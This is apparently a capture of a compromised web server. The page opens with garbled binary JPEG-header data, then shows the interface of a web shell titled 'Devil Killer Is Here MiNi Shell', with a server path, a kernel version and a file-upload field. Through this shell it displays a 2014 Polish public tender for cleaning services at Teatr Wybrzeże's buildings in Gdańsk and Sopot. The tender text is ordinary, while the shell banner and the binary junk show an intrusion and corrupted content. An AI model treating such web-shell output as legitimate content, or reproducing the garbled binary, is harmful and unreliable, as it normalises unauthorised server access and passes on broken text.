JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140214/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140214/53560-N-2014.html

<p class="kh_header"><b>Gdańsk: świadczenie usług sprzątania w obiektach Teatru Wybrzeże</b><br>
<b>Numer ogłoszenia: 53560 - 2014; data zamieszczenia: 14.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowy Teatr "Wybrzeże" , ul. Świętego Ducha 2, 80-834 Gdańsk, woj. pomorskie, tel. 058 3011836, faks 058 3012046.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.teatrwybrzeze.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> świadczenie usług sprzątania w obiektach Teatru Wybrzeże.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług w zakresie:
1) sprzątania pomieszczeń w budynkach ZAMAWIAJĄCEGO przy ul. Św. Ducha 2 i ul. Teatralnej 2 w Gdańsku oraz Sceny Kameralnej w Sopocie przy ul. Bohaterów Monte Cassino 30 wraz z przyległym do tych obiektów terenem zewnętrznym, z zastrzeżeniem §3 ust.20,
2) zaopatrywania w artykuły higieniczne oraz środki czystości pomieszczeń sanitarnych oraz kuchennych w obiektach o których mowa w pkt 1) (zgodnie z treścią § 3 ust. 10).
2.	W odniesieniu do obiektów w Gdańsku usługa sprzątania obejmuje następujące powierzchnie:
1) Scena Duża wraz z widownią (450 miejsc siedzących - fotele welurowe) i lożami:
- scena, wraz z kieszeniami bocznymi powierzchnia - ok. 614m2 - podłoga drewniana,
- widownia z balkonem i lożami - 341m2 - wykładzina
2) scena Czarna Sala ( max 80 miejsc - krzesła welurowe) powierzchnia - ok. 113,6 m2 - podłoga drewniana
3) scena Malarnia wraz z widownią(max 100 miejsc - krzesła welurowe ) powierzchnia - ok. 251,1m2 - podłoga drewniana, foyer sceny Malarnia - 111,4m2 - wykładzina dywanowa
d) foyer główne, powierzchnia - ok. 1082m2 - posadzka kamienna
4) sala prób w budynku Stara Apteka, powierzchnia - ok. 56,7m2 - podłoga z wykładziny dywanowej
5) pozostałe pomieszczenia 
- WC i łazienki - powierzchnia łączna: 148 m2, podłoga - gres, ściany - kafelki do ok. 2 m wysokości pomieszczenia, armatura - 40 umywalek, 39 misek klozetowych, 5 pisuarów, 17 pryszniców, 9 zlewów 
- 3 pomieszczenia socjalne (pentra) pow. łącznie ok. 33 m2, podłoga gres, 3 zlewy, 1 płyta grzewcza, 3 lodówki, zabudowa kuchenna
- powierzchnia wykładzin dywanowych (w tym na klatkach schodowych w części administracyjnej - 
ok. 1410 m2
- powierzchnie z posadzkami betonowymi - ok. 497 m2
- powierzchnie wykładzin linoleum - 156m2
- powierzchnie z posadzkami gresowymi - 111m2
- parkiety - 51,1 m2
- podłoga PCV - 115,55m2
- pomieszczenia piwniczne - powierzchnia betonowa ok. 1200m2
- okna i inne powierzchnie szklane ok. 240m2 
- teren zewnętrzny - powierzchnia ok. 350 m2
3.	W odniesieniu do obiektu w Sopocie usługa sprzątania obejmuje następujące powierzchnie:
1) sala teatralna - powierzchnia 252 m2, podłoga - deski, widownia - maksymalnie 250 miejsc siedzących (demontowalnych w zależności do potrzeb) - krzesła tapicerowane,
2) foyer - powierzchnia 96,31 m2, podłoga - posadzka żywiczna,
3) WC i łazienki - powierzchnia łączna: 120,65 m2, podłoga - gres, ściany - kafelki do 2,8 m wysokości pomieszczenia, armatura - 33 umywalki, 20 misek klozetowych, 3 pisuary, 6 pryszniców, 9 zlewów 1-komorowych),
4) pomieszczenia zaplecza:
- powierzchnia wykładzin - 271 m2
- korytarze, klatki schodowe, tarasy, piwnica i pozostałe pomieszczenia - gres
5) powierzchnie szklane: 14 okien - 44,96 m2, witryna stała - 51,45 m2
6) teren zewnętrzny - kostka granitowa - powierzchnia ok. 150 m2; teren od ul. Pułaskiego - 144m2, teren przy wejściu do Teatru od strony ul. Boh. Monte Cassino - ok. 6 m2
4.	W ramach realizacji usługi sprzątania w odniesieniu do obiektów w Gdańsku WYKONAWCA zobowiązany jest:
1) codziennie, od poniedziałku do niedzieli wykonywać następujące czynności:
a) odkurzać wykładziny w pomieszczeniach, korytarzach i klatkach schodowych, wraz z myciem listew naschodowych
b) odkurzać wycieraczki i maty wejściowe przy wejściu głównym i administracyjnym
c) myć powierzchnie twarde (podłogi, schody, ściany kafelkowe)
d) opróżniać i myć kosze + każdorazowa wymiana worków, 
e) opróżniać i myć popielniczki 
f) odkurzać i myć właściwymi środkami urządzenia biurowe, telefony, lampy, krzesła
g) odkurzać i myć meble, powierzchnie przeszklone wewnętrzne
h) wycierać lustra, okucia drzwiowe i okienne, baterie łazienkowe
i) sprzątać ciągi komunikacyjne
j) sprzątać sale widowiskowe oraz sale prób przed i po każdym spektaklu
k) sprzątać sceny zgodnie z tygodniowym rozkładem zajęć, prób i przedstawień. Zapewnić odpowiednią liczbę osób sprzątających  przy czyszczeniu scenografii (np. szybka zmiana w spektaklu) oraz odpowiednich środków np.  do czyszczenia ekranów, folii, podłóg baletowych,  tapicerki, itd)
l) myć drzwi wejścia głównego, poręcze i okucia drzwiowe
ł) myć na mokro i dezynfekować pomieszczenia łącznie z glazurą i urządzenia sanitarne wraz z szafkami, lustrami szczotkami wc skutecznymi środkami 
m) zamiatać teren zewnętrzny, usuwać śmieci, niedopałki, butelki, szkło, a w okresie zimowym zapewniać bezpieczeństwo przechodniów i widzów poprzez odśnieżanie, posypywanie piaskiem i środkiem rozpuszczającym śnieg i lód (zakup i dostarczenie piasku i środków rozpuszczających w odpowiednich pojemnikach leży w gestii WYKONAWCY)
n) czyścić gabloty znajdujące się na terenie teatru oklejoną teatralnymi plakatami ścianą zewnętrzną 
o) czyścić odpowiednimi środkami windę osobowo-towarową (ściany ze stali nierdzewnej)
p) czyścić odpowiednimi środkami płytę grzewczą w pomieszczeniu socjalnym na III piętrze
2) stosownie do potrzeb, nie rzadziej jednak niż trzy razy w tygodniu:
a) odkurzać tapicerkę meblową 
b) odkurzać fotele w:sali widowiskowej 
c) odkurzać i myć trudno dostępne części mebli, parapetów, kaloryferów oraz zakamarków
d) polerować podłogi.
e) udrażniać środkami chemicznymi kanalizację we wszystkich łazienkach 
f) sprzątać pomieszczenia piwniczne (odkurzanie, mycie podłóg i rur)
g) czyścić drzwi wejściowe do Teatru oraz na scenę Malarnia i do części administracyjnej
3) wykonywać następujące czynności okresowe:
a) prać wykładziny oraz wycieraczki i  maty wejściowe- wg wskazań ZAMAWIAJĄCEGO nie rzadziej niż 3 razy w ciągu roku oraz usuwać na bieżąco zabrudzenia powstałe w skutek użytkowania
b) myć okna obustronnie - według wskazań ZAMAWIAJĄCEGO nie rzadziej niż 2 razy w ciągu roku (min. w miesiącach kwietniu i listopadzie)
c) zapewnić konserwację parkietów, zapewnić mechaniczne czyszczenie wykładzin PCV, kamiennych posadzek i schodów na foyer (granit i marmur), posadzek i klatek schodowych kamień/lastryko przynajmniej 1 raz w tygodniu oraz konserwację tych podłóg  - oraz naniesieniem odpowiedniego środka nabłyszczającego i konserwującego według wskazań ZAMAWIAJĄCEGO nie rzadziej niż 2 razy w ciągu roku
d) zapewnić konserwację mebli biurowych - nie rzadziej niż 1 raz w tygodniu
e) obustronne mycie powierzchni szklanych tj. szklanej elewacji budynku o powierzchni ok. 240 m 2  budynku 2 razy w roku w okresie wiosennym i jesiennym, a także ścian luksferowych na klatkach schodowych w części administracyjnej budynku głównego
f) usuwanie kurzu i pajęczyn z wszystkich ścian i powierzchni w zależności od potrzeb jednak nie rzadziej niż 1 raz w tygodniu
g) zapewnić bieżące sprzątanie scen podczas montażu i demontażu dekoracji - stosownie do potrzeb
h) zapewnić uprzątnięcie pomieszczeń ZAMAWIAJĄCEGO każdorazowo po przeprowadzeniu w nich prac remontowych
i) nie rzadziej niż raz w roku wykonać czyszczenie urządzeniem typu karcher foteli i krzeseł na widowniach, foyer, w palarni oraz na korytarzach w części administracyjnej budynku głównego-  min. we wrześniu 
j) w zależności od potrzeb wycierać poręcze, gaśnice, kratki wentylacyjne oraz zewnętrzne parapety na parterze budynku głównego,
k) w pomieszczeniach socjalnych w obiekcie w Gdańsku czyścić lodówki (3szt.) - nie rzadziej niż 1 raz w miesiącu
l) nie rzadziej niż 1 raz w miesiącu czyścić kratki wentylacyjne 
ł) w okresie zimowym odśnieżać i posypywać środkiem rozpuszczającym śnieg (lód) i piaskiem powierzchnie wokół obiektów ZAMAWIAJĄCEGO ul. Teatralna, ul. Św. Ducha i Targ Węglowy).
5.	W ramach realizacji usługi sprzątania w odniesieniu do obiektów w Gdańsku WYKONAWCA zobowiązany jest nadto:
1) w zależności od potrzeb,  zapewniać dyżur osób sprzątających (1 lub 2 - zgodnie ze zgłoszonym telefonicznie zapotrzebowaniem) w trakcie trwania spektakli i imprez w celu bieżącego utrzymania czystości w toaletach, na foyer i scenie oraz ewentualnego uzupełniania środków czystości w toaletach,
2) zapewniać dyżur 2 osób sprzątających w budynku biurowym codziennie w godz. 9,00-22,00 w celu utrzymania czystości w części administracyjnej budynku.
6.	WYKONAWCA realizował będzie usługę sprzątania w odniesieniu do obiektów w Gdańsku zgodnie z następującymi zasadami:
1) sprzątanie korytarzy, klatek schodowych, pomieszczeń biurowych, palarni i bufetu oraz toalet 
i pomieszczeń socjalnych w sekretariacie i na II piętrze części administracyjnej odbywać się musi do godz. 7.45.
2) sprzątanie kas biletowych, foyer na parterze łącznie z toaletami odbywać się musi do godz. 11.00.
3) pozostałe pomieszczenia wraz ze sceną będą sprzątane będą w godzinach niekolidujących z terminami wystawiania przedstawień i przeprowadzania prób (ich plan WYKONAWCA zobowiązany jest z odpowiednim wyprzedzeniem pobrać od ZAMAWIAJĄCEGO)
4) ze względu na instalacje sceny obrotowej podłoga na Dużej Scenie może być sprzątana wyłącznie 
za pomocą odkurzacza (bezwzględnie nie może być zamiatana).
7.	Nieczystości/odpadki zgromadzone w związku z realizacją przedmiotu zamówienia w odniesieniu 
do obiektów w Gdańsku WYKONAWCA zobowiązany jest usuwać na bieżąco do śmietnika ZAMAWIAJĄCEGO znajdującego się na dziedzińcu (wejście od ul. Kołodziejskiej).

8.	W ramach realizacji usługi sprzątania w odniesieniu do obiektu Scena Kameralna w Sopocie przy 
ul. Bohaterów Monte Cassino 30 WYKONAWCA zobowiązany jest:
1)  codziennie od poniedziałku do niedzieli wykonywać następujące czynności:
a) odkurzać wykładziny oraz myć listwy podłogowe
b) myć powierzchnie twarde (podłogi, schody, ściany kafelkowe)
c) opróżniać i myć kosze na śmieci, popielniczki
d) odkurzać urządzenia biurowe, telefony, lampy, krzesła
e) odkurzać i myć meble, powierzchnie przeszklone wewnętrzne,  parapety wewnętrzne, parapety i balustrady w loggiach,
f) każdorazowo wymieniać worki na śmieci
g) wycierać lustra, okucia drzwiowe i okienne, baterie łazienkowe
h) sprzątać ciągi komunikacyjne
i) sprzątać salę teatralną przed i po każdym spektaklu
j) sprzątać scenę oraz scenografię wg wskazań ZAMAWIAJĄCEGO zgodnie z tygodniowym rozkładem zajęć, prób i przedstawień . 
k) zapewnić odpowiednią liczbę osób sprzątających  przy czyszczeniu scenografii (np. szybka zmiana w spektaklu) oraz odpowiednich środków np.  do czyszczenia ekranów, folii, podłóg baletowych,  tapicerki, itd)
k) myć drzwi wejścia głównego, poręcze i okucia drzwiowe
l) sprzątać i dezynfekować pomieszczenia i urządzenia sanitarne skutecznymi środkami
ł) zamiatać teren zewnętrzny, usuwać śmieci, niedopałki, butelki, szkło, a w okresie zimowym odśnieżać 
i posypywać piaskiem i środkiem rozpuszczającym śnieg i lód, (zakup i dostarczenie piasku i środków rozpuszczających w odpowiednich pojemnikach leży w gestii WYKONAWCY)
m) czyścić gabloty i stojaki reklamowe znajdujące na terenie obiektu oraz wejście do niego od ul. Bohaterów Monte Cassino
n) czyścić lodówki, kuchenki mikrofalowe, płyty grzewcze,
o) myć i polerować naczynia, naczynia szklane oraz sztućce w pokojach gościnnych,
p) zmieniać bieliznę pościelową oraz ręczniki w pokojach gościnnych oraz garderobach (4 pokoje, 2 garderoby),
r) odkurzać wycieraczki i maty wejściowe przy wejściu głównym i administracyjnym,
s) czyścić odpowiednimi środkami elementy ze stali nierdzewnej (okucia, meble).

2) stosownie do potrzeb, jednak nie rzadziej niż trzy razy w tygodniu:
a) odkurzać tapicerkę meblową
b) odkurzać i myć widownię oraz krzesła w sali teatralnej
c) odkurzać i myć trudno dostępne części mebli, parapetów, kaloryferów oraz zakamarków
d) polerować podłogi
e) udrażniać środkami chemicznymi kanalizację we wszystkich łazienkach
f) sprzątać pomieszczenia piwniczne (odkurzanie, mycie podłóg i rur)
g) czyścić gabloty znajdujące się przy wejściu do Teatru
h) sprzątać (zbieranie śmieci, mycie podłogi) pomieszczenia na składowanie śmieci.

3) wykonywać następujące czynności okresowe:
a) prać wykładziny - wg wskazań ZAMAWIAJĄCEGO nie rzadziej niż 2 razy w ciągu trwania umowy oraz usuwać na bieżąco zabrudzenia powstałe w skutek użytkowania
b) myć okna i świetliki obustronnie - według wskazań ZAMAWIAJĄCEGO nie rzadziej niż 2 razy w ciągu roku
c) wykonać mechaniczne (urządzeniem typu karcher) czyszczenie mebli i krzeseł na widowni i pozostałych pomieszczeniach - wg wskazań ZAMAWIAJĄCEGO nie rzadziej niż 2 razy w ciągu roku,
d) w zależności od potrzeb wycierać poręcze, gaśnice, kratki wentylacyjne, anemostaty, rury wentylacyjne, rolety, żaluzje, rury i kratki wentylacyjne na sali teatralnej oraz pomost techniczny - wg wskazań ZAMAWIAJĄCEGO, nie rzadziej niż raz na kwartał.
e) zapewnić konserwację parkietów, wykładzin PCV środkami konserwującymi - według wskazań ZAMAWIAJĄCEGO nie rzadziej niż 2 razy w ciągu roku,
f) zapewnić konserwację mebli biurowych - nie rzadziej niż 1 x w tygodniu
g) myć powierzchnie szklane,  aluminiowe, okratowanie przy elewacji oraz ścianę luksferową budynku 2 razy w roku w okresie wiosennym i jesiennym, ok. 140m2 płyt aluminiowych, pow. szklana ok. 51m2, pow. okratowania ok. 86,2  m2, pow. ściany luksferowej ok.0,96 m2,
h) myć elewację z tynku imitującego beton (86 m2) wg wskazań producenta nie rzadziej niż 2 razy w roku
i) usuwanie kurzu i pajęczyn z wszystkich ścian i powierzchni w zależności od potrzeb jednak nie rzadziej niż l raz w tygodniu
j) zapewnić bieżące sprzątanie scen podczas montażu i demontażu dekoracji - stosownie do potrzeb
k) zapewnić mechaniczne czyszczenie epoksydowej posadzki samopoziomującej STO POX BB OS nie rzadziej niż 1 raz w miesiącu lub na wezwanie ZAMAWIAJĄCEGO oraz konserwację tej podłogi raz na kwartał  poprzez woskowanie środkiem o nazwie STO DIVERS P 105 lub równoważnym
l) utrzymywać czystość wokół gablot usytuowanych na foyer i na froncie Teatru
ł) 1 raz w miesiącu prać wycieraczki typu Zeno Protect Super, powierzchnia 10m2
m) zapewnić uprzątnięcie pomieszczeń ZAMAWIAJĄCEGO każdorazowo po przeprowadzeniu w nich prac remontowych.
n) myć elewację obiektu od ul. Bohaterów Monte Cassino (blacha Alucobond, powierzchnia 30m2) - wg wskazań ZAMAWIAJĄCEGO, nie rzadziej niż raz w miesiącu,
o) myć pomieszczenie kasy biletowej (ściany ze szkła), szatni oraz przeszklonych ścian wewnątrz budynku - wg wskazań ZAMAWIAJĄCEGO, ale nie rzadziej niż raz w miesiącu.

9.	W ramach realizacji usługi sprzątania w odniesieniu do obiektu w Sopocie WYKONAWCA zobowiązany jest nadto:
1) W zależności od potrzeb zapewnić dyżur osób sprzątających (ustalane telefonicznie) w trakcie trwania spektakli i imprez w celu bieżącego utrzymania czystości w toaletach, na foyer, scenie oraz w zależności od potrzeb we wszystkich pomieszczeniach  oraz ewentualnego uzupełnienia środków czystości,
2) Zapewniać dyżur osób sprzątających  w budynku codziennie od godz.6:00 do 22:00 w celu utrzymania czystości w budynku.
3) Zapewnić sprzątanie korytarzy, klatek schodowych, toalet wraz z  kabinami prysznicowymi oraz pozostałych pomieszczeń -  do godz. 7:45,
4) Zapewnić sprzątanie kas biletowych, foyer, baru i toalet -  do godz. 11:00 lub wg wskazań ZAMAWIAJĄCEGO
 i   z uwzględnieniem  harmonogramu pracy ZAMAWIAJĄCEGO,
5) zapewnić sprzątanie pozostałych pomieszczeń wraz ze sceną  wg wskazań ZAMAWIAJĄCEGO i z uwzględnieniem  harmonogramu pracy ZAMAWIAJĄCEGO,
6) zapewnić, że pomieszczenia, które nie z winy WYKONAWCY,  nie mogą być sprzątnięte do godz. 7:45, zostaną sprzątnięte wg wskazań ZAMAWIAJĄCEGO i   z uwzględnieniem harmonogramu pracy ZAMAWIAJĄCEGO,
7) usuwać nieczystości/odpadki zgromadzone w związku z realizacją przedmiotu do śmietnika ZAMAWIAJĄCEGO

10. Realizując usługę sprzątania w odniesieniu do wszystkich obiektów o których mowa w § 3 ust.1 WYKONAWCA zobowiązany jest:
1) wymieniać mopy do czyszczenia podłóg, ścierki  nie rzadziej raz w tygodniu,
2) codziennie czyścić wycieraczki wewnętrzne i zewnętrzne,
3) nie rzadziej niż raz w roku wykonać mycie żyrandoli, lamp, kinkietów i plafonów,
4) na bieżąco usuwać plamy z wykładzin dywanowych,
5) sprawdzać na bieżąco stan schodów i chodników, szczególnie w godzinach popołudniowych przed rozpoczęciem przedstawienia i w razie potrzeby sprzątać je,
6) sprawdzać czystość ścian zewnętrznych i usuwać ewentualne zabrudzenia w postaci naklejek, ogłoszeń, graffiti, itp. i w razie stwierdzenia,
7) usuwać w razie potrzeby zabrudzenia ze ścian wewnętrznych.
11. W ramach umówionego wynagrodzenia WYKONAWCA zobowiązany jest na bieżąco uzupełniać 
w obiektach wskazanych w § 3 ust.1 zasoby artykułów higienicznych i środków czystości: ręczników papierowych (typu  ZZ w pomieszczeniach wc i na rolce w tzw. pentrach), papieru toaletowego, środków dezynfekcyjnych, mydła w płynie, płynu do mycia naczyń i zmywaków (gąbek), odświeżacze powietrza (w aerozolu - w części administracyjno biurowej - wc ogólnodostępne oraz w garderobach i pokojach gościnnych), w pozostałych - dla widzów  - tzw grzybki), oraz innych środków potrzebnych do wykonania zamówienia. 
12. Pracownicy WYKONAWCY zobowiązane są zgłaszać wszelkie zauważone usterki do działu administracji ZAMAWIAJĄCEGO lub wpisywać do książki awarii.

13.	W ramach umówionego wynagrodzenia WYKONAWCA realizował będzie przedmiot umowy 
z wykorzystaniem własnych środków czystości i artykułów higienicznych (w tym uzupełnianych) dopuszczonych do używania przez Państwowy Zakład Higieny, własnych narzędzi i urządzeń technicznych posiadających wymagane przepisami certyfikaty oraz znak bezpieczeństwa.
14.	WYKONAWCA będzie realizował przedmiot umowy za pomocą osób posiadających doświadczenie w wykonywaniu tego typu czynności, w liczbie gwarantującej wysoką jakość świadczonych usług, jednak nie mniej niż dwie osoby w Gdańsku.
15.	WYKONAWCA zobowiązany jest zastosować się do uzasadnionego żądania ZAMAWIAJĄCEGO dotyczącego zmiany środków czystości i środków higienicznych wykorzystywanych do realizacji przedmiotu umowy (w razie używania zbyt cienkich ręczników papierowych, środków czystości o nieprzyjemnym zapachu, itp.).
16.	WYKONAWCA zapewni zatrudnionym przez siebie osobom wykonującym czynności sprzątania odzież zapewniającą ich identyfikację wraz z identyfikatorami imiennymi oraz zobowiąże swoich pracowników do ich noszenia
17.	WYKONAWCA zobowiązuje się do sprawdzania i egzekwowania czystości osobistej swoich pracowników
18.	Aby zapewnić sprawną realizacją przedmiotu umowy WYKONAWCA zobowiązany jest:
1) wyposażyć ekipy sprzątające w telefony komórkowe (jeden w obiekcie w Gdańsku i jeden w Sopocie), celem umożliwienia bieżącego, stałego kontaktu ZAMAWIAJĄCEGO z nimi,
2) wyznaczyć w każdej ekipie (zmiana poranna i popołudniowa) osobę odpowiedzialną za bezpośredni kontakt z ZAMAWIAJĄCYM i przekazywanie otrzymanych od niego informacji/zaleceń pozostałym członkom ekipy,  
3) sprawdzać jakość wykonywanych przez swoich pracowników usług przynajmniej raz w miesiącu
19.	WYKONAWCA zobowiązany jest wykonywać prace określone niniejszym zamówieniem w sposób nie powodujący zakłóceń w rytmie pracy ZAMAWIAJĄCEGO, zgodnie z jego tygodniowym planem zajęć, prób i przedstawień, z którym WYKONAWCA ma obowiązek na bieżąco się zapoznawać.

20. W ramach realizacji przedmiotu zamówienia i określonego nim wynagrodzenia WYKONAWCA zobowiązany jest, nie częściej niż dwa razy w miesiącu, realizować usługę sprzątania (odkurzać wykładziny, myć powierzchnie twarde podłogi i schody, opróżniać i myć kosze, popielniczki, sprzątać salę widowiskową oraz salę prób) również w innych wskazanych przez ZAMAWIAJĄCEGO miejscach na terenie Trójmiasta (poza obiektami o których mowa w §3 ust. 1) - w wypadku jeśli ZAMAWIAJĄCY wystawiał będzie w nich spektakle..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania obowiązany jest do wniesienia wadium w wysokości 8.000 zł (słownie: osiem tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych i nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 pkt 5 ustawy Prawo zamówień publicznych. Ocena spełnienia ww. warunków zostanie dokonana wg formuły: spełnia/nie spełnia na podstawie złożonych przez wykonawcę wymaganych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Należy załączyć do oferty wykaz co najmniej dwóch zamówień polegających na realizacji co najmniej dwóch usług odpowiadających przedmiotowi zamówienia tj. usłusługi sprzątania w obiekcie użyteczności publicznej w budynku o powierzchni użytkowej nie mniejszej niż 6000m2 o wartości brutto nie mniejszej niż 300.000,00 zł każda,, wykonanych lub wykonywanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu (w tym powierzchni obiektów), dat wykonania i odbiorców oraz załączonym dokumentem potwierdzającym (podpisanym przez odbiorców), że te usługi zostały wykonane lub są wykonywane należycie. Ocena spełnienia ww. warunków zostanie dokonana wg formuły: 